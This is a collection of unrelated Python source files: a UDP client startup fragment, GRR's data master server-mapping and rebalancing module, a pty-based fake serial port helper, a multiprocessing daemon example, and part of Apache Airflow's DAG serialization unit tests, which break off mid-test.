if "-debug" in args:
logging.basicConfig(format=log_format,
level=logging.DEBUG, datefmt=time_format)
else:
logging.basicConfig(format=log_format,
level=logging.WARNING, datefmt=time_format)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(("", 3400))
instance_info = {
"ip": ip,
"port": port,
"socket": sock,
"name": "Ryan Rennoir",
"password": "asd",
"speed": 250,
"cmd_password": ""
}
q = queue.Queue()
stop_worker = False
thread_acc = threading.Thread(target=acc_run, args=(instance_info, q))
thread_acc.start()
app = App(queue_in=q, info=gui_info)
app.mainloop()
stop_worker = True
thread_acc.join()
sock.close()
logging.debug("Socket closed")
|
master.py
|
#!/usr/bin/env python
"""Data master specific classes."""
import socket
import threading
import urlparse
import urllib3
from urllib3 import connectionpool
import logging
from grr.lib import config_lib
from grr.lib import rdfvalue
from grr.lib import utils
from grr.server.data_server import constants
from grr.server.data_server import rebalance
from grr.server.data_server import utils as sutils
class DataMasterError(Exception):
"""Raised when some critical error happens in the data master."""
pass
class DataServer(object):
"""DataServer objects for each data server."""
def __init__(self, location, index):
# Parse location.
loc = urlparse.urlparse(location, scheme="http")
offline = rdfvalue.DataServerState.Status.OFFLINE
state = rdfvalue.DataServerState(size=0, load=0, status=offline)
self.server_info = rdfvalue.DataServerInformation(index=index,
address=loc.hostname,
port=loc.port,
state=state)
self.registered = False
self.removed = False
logging.info("Configured DataServer on %s:%d", self.Address(), self.Port())
def SetInitialInterval(self, num_servers):
self.server_info.interval = sutils.CreateStartInterval(self.Index(),
num_servers)
def IsRegistered(self):
return self.registered
def Matches(self, addr, port):
if isinstance(addr, list):
if self.Address() not in addr:
return False
else:
# Handle hostnames and IPs
if socket.gethostbyname(self.Address()) != socket.gethostbyname(addr):
return False
return self.Port() == port
def Register(self):
"""Once the server is registered, it is allowed to use the database."""
self.registered = True
def Deregister(self):
self.registered = False
def Port(self):
return self.server_info.port
def Address(self):
return self.server_info.address
def Index(self):
return self.server_info.index
def SetIndex(self, newindex):
self.server_info.index = newindex
def Size(self):
return self.server_info.state.size
def Load(self):
return self.server_info.state.load
def Interval(self):
return self.server_info.interval
def SetInterval(self, start, end):
self.server_info.interval.start = start
self.server_info.interval.end = end
def GetInfo(self):
return self.server_info
def UpdateState(self, newstate):
"""Update state of server."""
self.server_info.state = newstate
def Remove(self):
self.removed = True
def WasRemoved(self):
return self.removed
class DataMaster(object):
"""DataMaster information."""
def __init__(self, myport, service):
self.service = service
stores = config_lib.CONFIG["Dataserver.server_list"]
if not stores:
logging.error("Dataserver.server_list is empty: no data servers will"
" be available")
raise DataMasterError("Dataserver.server_list is empty")
self.servers = [DataServer(loc, idx) for idx, loc in enumerate(stores)]
self.registered_count = 0
# Load server mapping.
self.mapping = self.service.LoadServerMapping()
if not self.mapping:
# Bootstrap mapping.
# Each server information is linked to its corresponding object.
# Updating the data server object will reflect immediately on
# the mapping.
for server in self.servers:
server.SetInitialInterval(len(self.servers))
servers_info = [server.server_info for server in self.servers]
self.mapping = rdfvalue.DataServerMapping(version=0,
num_servers=len(self.servers),
servers=servers_info)
self.service.SaveServerMapping(self.mapping, create_pathing=True)
else:
# Check mapping and configuration matching.
if len(self.mapping.servers) != len(self.servers):
raise DataMasterError("Server mapping does not correspond "
"to the configuration.")
for server in self.servers:
self._EnsureServerInMapping(server)
# Create locks.
self.server_lock = threading.Lock()
# Register the master.
self.myself = self.servers[0]
if self.myself.Port() == myport:
self._DoRegisterServer(self.myself)
else:
logging.warning("First server in Dataserver.server_list is not the "
"master. Found port '%i' but my port is '%i'. If you"
" really are running master, you may want to specify"
" flag --port %i.",
self.myself.Port(), myport, myport)
raise DataMasterError("First server in Dataserver.server_list must be "
"the master.")
# Start database measuring thread.
sleep = config_lib.CONFIG["Dataserver.stats_frequency"]
self.periodic_thread = utils.InterruptableThread(
target=self._PeriodicThread, sleep_time=sleep)
self.periodic_thread.start()
# Holds current rebalance operation.
self.rebalance = None
self.rebalance_pool = []
def LoadMapping(self):
return self.mapping
def _PeriodicThread(self):
"""Periodically update our state and store the mappings."""
ok = rdfvalue.DataServerState.Status.AVAILABLE
num_components, avg_component = self.service.GetComponentInformation()
state = rdfvalue.DataServerState(size=self.service.Size(),
load=0,
status=ok,
num_components=num_components,
avg_component=avg_component)
self.myself.UpdateState(state)
self.service.SaveServerMapping(self.mapping)
def _EnsureServerInMapping(self, server):
"""Ensure that the data server exists on the mapping."""
index = server.Index()
server_info = self.mapping.servers[index]
if server_info.address != server.Address():
return False
if server_info.port != server.Port():
return False
# Change underlying server information.
server.server_info = server_info
def RegisterServer(self, addr, port):
"""Register incoming data server. Return server object."""
for server in self.servers:
if server == self.myself:
continue
if server.Matches(addr, port):
with self.server_lock:
if server.IsRegistered():
return None
else:
self._DoRegisterServer(server)
return server
return None
def HasServer(self, addr, port):
"""Checks if a given server is already in the set."""
for server in self.servers:
if server.Matches(addr, port):
return server
return None
def _DoRegisterServer(self, server):
self.registered_count += 1
server.Register()
logging.info("Registered server %s:%d", server.Address(), server.Port())
if self.AllRegistered():
logging.info("All data servers have registered!")
def DeregisterServer(self, server):
"""Deregister a data server."""
with self.server_lock:
server.Deregister()
self.registered_count -= 1
def AllRegistered(self):
"""Check if all servers have registered."""
return self.registered_count == len(self.servers)
def Stop(self):
self.service.SaveServerMapping(self.mapping)
self.periodic_thread.Stop()
def SetRebalancing(self, reb):
"""Sets a new rebalance operation and starts communication with servers."""
self.rebalance = reb
self.rebalance_pool = []
try:
for serv in self.servers:
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
self.rebalance_pool.append(pool)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CancelRebalancing(self):
self.rebalance = None
for pool in self.rebalance_pool:
pool.close()
self.rebalance_pool = []
def IsRebalancing(self):
return self.rebalance
def AddServer(self, addr, port):
"""Add new server to the group."""
server = DataServer("http://%s:%d" % (addr, port), len(self.servers))
self.servers.append(server)
server.SetInterval(constants.MAX_RANGE, constants.MAX_RANGE)
self.mapping.servers.Append(server.GetInfo())
self.mapping.num_servers += 1
# At this point, the new server is now part of the group.
return server
def RemoveServer(self, removed_server):
"""Remove a server. Returns None if server interval is not empty."""
interval = removed_server.Interval()
# Interval range must be 0.
if interval.start != interval.end:
return None
# Update ids of other servers.
newserverlist = []
for serv in self.servers:
if serv == removed_server:
continue
if serv.Index() > removed_server.Index():
serv.SetIndex(serv.Index() - 1)
newserverlist.append(serv.GetInfo())
# Change list of servers.
self.mapping.servers = newserverlist
self.mapping.num_servers -= 1
self.servers.pop(removed_server.Index())
self.DeregisterServer(removed_server)
removed_server.Remove()
return removed_server
def SyncMapping(self, skip=None):
"""Syncs mapping with other servers."""
pools = []
try:
# Update my state.
self._PeriodicThread()
for serv in self.servers[1:]:
if skip and serv in skip:
continue
pool = connectionpool.HTTPConnectionPool(serv.Address(),
port=serv.Port())
pools.append((serv, pool))
body = self.mapping.SerializeToString()
headers = {"Content-Length": len(body)}
for serv, pool in pools:
res = pool.urlopen("POST", "/servers/sync", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.warning("Could not sync with server %s:%d", serv.Address(),
serv.Port())
return False
state = rdfvalue.DataServerState()
state.ParseFromString(res.data)
serv.UpdateState(state)
except urllib3.exceptions.MaxRetryError:
return False
finally:
for _, pool in pools:
pool.close()
return True
def FetchRebalanceInformation(self):
"""Asks data servers for number of changes for rebalancing."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/statistics", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
reb = rdfvalue.DataServerRebalance()
reb.ParseFromString(res.data)
ls = list(reb.moving)
if ls:
logging.warning("Moving %d", ls[0])
self.rebalance.moving.Append(ls[0])
else:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def CopyRebalanceFiles(self):
"""Tell servers to copy files to the corresponding servers."""
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for pool in self.rebalance_pool:
try:
res = pool.urlopen("POST", "/rebalance/copy", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
self.CancelRebalancing()
return False
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return False
return True
def RebalanceCommit(self):
"""Tell servers to commit rebalance changes."""
# Save rebalance information to a file, so we can recover later.
rebalance.SaveCommitInformation(self.rebalance)
body = self.rebalance.SerializeToString()
size = len(body)
headers = {"Content-Length": size}
for i, pool in enumerate(self.rebalance_pool):
try:
res = pool.urlopen("POST", "/rebalance/perform", headers=headers,
body=body)
if res.status != constants.RESPONSE_OK:
logging.error("Server %d failed to perform transaction %s", i,
self.rebalance.id)
self.CancelRebalancing()
return None
stat = rdfvalue.DataServerState()
stat.ParseFromString(res.data)
data_server = self.servers[i]
data_server.UpdateState(stat)
except urllib3.exceptions.MaxRetryError:
self.CancelRebalancing()
return None
# Update server intervals.
mapping = self.rebalance.mapping
for i, serv in enumerate(list(self.mapping.servers)):
serv.interval = mapping.servers[i].interval
self.rebalance.mapping = self.mapping
self.service.SaveServerMapping(self.mapping)
# We can finally delete the temporary file, since we have succeeded.
rebalance.DeleteCommitInformation(self.rebalance)
rebalance.RemoveDirectory(self.rebalance)
self.CancelRebalancing()
return self.mapping
|
__init__.py
|
import threading
import os
import pty
def create_dummy_port(responses):
def listener(port):
# continuously listen to commands on the master device
while 1:
res = b''
while not res.endswith(b"\r"):
# keep reading one byte at a time until we have a full line
res += os.read(port, 1)
print("command: %s" % res)
# write back the response
if res in responses:
resp = responses[res]
del responses[res]
os.write(port, resp)
master, slave = pty.openpty()
thread = threading.Thread(target=listener, args=[master], daemon=True)
thread.start()
return os.ttyname(slave)
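# A minimal usage sketch (not part of the original module), assuming a POSIX
# host: register one fake command/response pair, open the returned slave
# device, send the command and read back the scripted reply.
if __name__ == "__main__":
    port_name = create_dummy_port({b"PING\r": b"PONG\r"})
    fd = os.open(port_name, os.O_RDWR | os.O_NOCTTY)
    os.write(fd, b"PING\r")
    # The reply is the scripted b"PONG\r"; the exact line ending seen here can
    # vary with the pty's termios settings, and the read may return partial data.
    print("reply:", os.read(fd, 64))
    os.close(fd)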
|
waiting_for_processes.py
|
#!/usr/bin/env python
# encoding: utf-8
import multiprocessing
import time
import sys
def daemon():
print('Starting:', multiprocessing.current_process().name)
time.sleep(2)
print('Exiting :', multiprocessing.current_process().name)
def non_daemon():
print('Starting:', multiprocessing.current_process().name)
print('Exiting :', multiprocessing.current_process().name)
if __name__ == '__main__':
d = multiprocessing.Process(name='daemon', target=daemon)
d.daemon = True
n = multiprocessing.Process(name='non-daemon', target=non_daemon)
n.daemon = False
d.start()
time.sleep(1)
n.start()
d.join()
n.join()
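# Expected output (roughly; the exact interleaving can vary between runs):
#   Starting: daemon
#   Starting: non-daemon
#   Exiting : non-daemon
#   Exiting : daemon   (about two seconds in; d.join() waits for this before n.join() returns)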
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_is_dummy": False,
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for the deserialized task, task.subdag is None for all operators
# except SubDagOperator, where task.subdag is an instance of the DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
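# Illustrative note (not part of the original test): in the serialized form a preset such as
# "@weekly" is stored as the plain string, while a timedelta is encoded as
#     {"__type": "timedelta", "__var": 86400.0}
# and decoded back to timedelta(days=1); normalized_schedule_interval then maps presets to their
# cron equivalents (e.g. "@weekly" -> "0 0 * * 0") and "@once" to None.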
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert that the extra serialized field exists and that Operator Links defined in Plugins
as well as inbuilt Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
The function tests that if an extra operator link is registered in a plugin
via ``operator_extra_links`` and the same is also defined on
the Operator in ``BaseOperator.operator_extra_links``, it has the correct
extra link.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert that if an OperatorLink is neither registered via Plugins nor an inbuilt Operator Link,
the DAG can still be deserialized (no error is raised) and an error is logged instead
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert that the extra serialized field exists and that Operator Links defined in Plugins
as well as inbuilt Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
